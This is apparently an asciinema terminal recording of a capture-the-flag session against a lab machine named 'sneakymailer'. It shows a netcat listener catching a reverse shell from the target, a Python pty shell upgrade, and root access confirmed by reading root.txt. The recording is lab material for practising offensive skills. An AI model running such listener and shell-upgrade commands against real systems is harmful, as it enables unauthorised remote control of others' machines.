{"version": 2, "width": 105, "height": 24, "timestamp": 1594829021, "env": {"SHELL": "/usr/bin/zsh", "TERM": "screen"}}
[0.049773, "o", "\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                                                        \r \r"]
[0.050379, "o", "\u001bk/home/prashant\u001b\\"]
[0.053958, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[0.053995, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[0.640936, "o", "asciinema rec"]
[0.904973, "o", "\u001b[13Drlwrap nc -nlvp 2345"]
[1.30295, "o", "\u001b[?1l\u001b>"]
[1.302994, "o", "\u001b[?2004l\r\r\n"]
[1.303344, "o", "\u001bkrlwrap\u001b\\"]
[1.305817, "o", "Ncat: Version 7.80 ( https://nmap.org/ncat )\r\r\nNcat: Listening on :::2345\r\r\nNcat: Listening on 0.0.0.0:2345\r\r\n"]
[1.350756, "o", "\r\r\u001b[K\r"]
[4.098853, "o", "Ncat: Connection from 10.10.10.197.\r\r\nNcat: Connection from 10.10.10.197:35706.\r\r\n"]
[4.140838, "o", "\r\r\u001b[K\r"]
[5.585276, "o", "\r\r\u001b[K\r"]
[5.585406, "o", "cd .."]
[5.745458, "o", "\rwc root.txt"]
[5.873197, "o", "\r\u001b[3Phostname"]
[6.008997, "o", "\r\u001b[2Pwhoami"]
[6.193277, "o", "\rpython -c 'import pty;pty.spawn(\"/bin/bash\")'"]
[6.943588, "o", "\r\u001b[K"]
[6.944751, "o", "python -c 'import pty;pty.spawn(\"/bin/bash\")'\r\r\n"]
[6.987512, "o", "\r\r\u001b[K\r"]
[7.306061, "o", "root@sneakymailer:~# "]
[7.353976, "o", "\r\r\u001b[K\rroot@sneakymailer:~# "]
[8.199732, "o", "\r\r\u001b[K\r"]
[8.199791, "o", "root@sneakymailer:~# w"]
[8.375888, "o", "h"]
[8.591959, "o", "o"]
[8.767981, "o", "a"]
[8.871765, "o", "m"]
[9.095901, "o", "i"]
[9.288123, "o", "\b\b\b\b\b\b\u001b[K"]
[9.289553, "o", "whoami\r\r\n"]
[9.333025, "o", "\r\r\u001b[K\r"]
[9.851446, "o", "whoami\r\r\r\n"]
[9.897648, "o", "\r\r\u001b[K\r"]
[10.180333, "o", "root\r\r\r\nroot@sneakymailer:~# "]
[10.222932, "o", "\r\r\u001b[K\rroot@sneakymailer:~# "]
[11.120551, "o", "\r\r\u001b[K\rroot@sneakymailer:~# h"]
[11.536459, "o", "o"]
[11.904258, "o", "s"]
[12.128325, "o", "t"]
[12.552457, "o", "n"]
[12.672607, "o", "a"]
[12.784778, "o", "m"]
[12.960812, "o", "e"]
[13.0964, "o", "\b\b\b\b\b\b\b\b\u001b[K"]
[13.097481, "o", "hostname\r\r\n"]
[13.138985, "o", "\r\r\u001b[K\r"]
[13.622396, "o", "hostname\r\r\r\n"]
[13.669487, "o", "\r\r\u001b[K\r"]
[14.113282, "o", "sneakymailer\r\r\r\nroot@sneakymailer:~# "]
[14.155934, "o", "\r\r\u001b[K\rroot@sneakymailer:~# "]
[15.6406, "o", "\r\r\u001b[K\r"]
[15.640646, "o", "root@sneakymailer:~# w"]
[16.049026, "o", "c"]
[16.224819, "o", " "]
[16.38482, "o", "r"]
[16.544744, "o", "o"]
[16.681104, "o", "o"]
[16.79313, "o", "t"]
[16.985289, "o", "."]
[17.369133, "o", "t"]
[17.504889, "o", "x"]
[17.536904, "o", "t"]
[17.833291, "o", "\b\b\b\b\b\b\b\b\b\b\b\u001b[K"]
[17.835237, "o", "wc root.txt\r\r\n"]
[17.886571, "o", "\r\r\u001b[K\r"]
[18.156793, "o", "wc root.txt\r\r\r\n"]
[18.200266, "o", "\r\r\u001b[K\r"]
[18.478174, "o", " 1  1 33 root.txt\r\r\r\nroot@sneakymailer:~# "]
[18.525823, "o", "\r\r\u001b[K\rroot@sneakymailer:~# "]
[19.428412, "o", "\r\n"]
[19.428589, "o", "\r\n\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                                                        \r \r"]
[19.428701, "o", "\u001bk/home/prashant\u001b\\"]
[19.432405, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[19.432436, "o", "\u001b[?1h\u001b="]
[19.432517, "o", "\u001b[?2004h"]
[19.753289, "o", "\u001b[?2004l\r\r\n"]
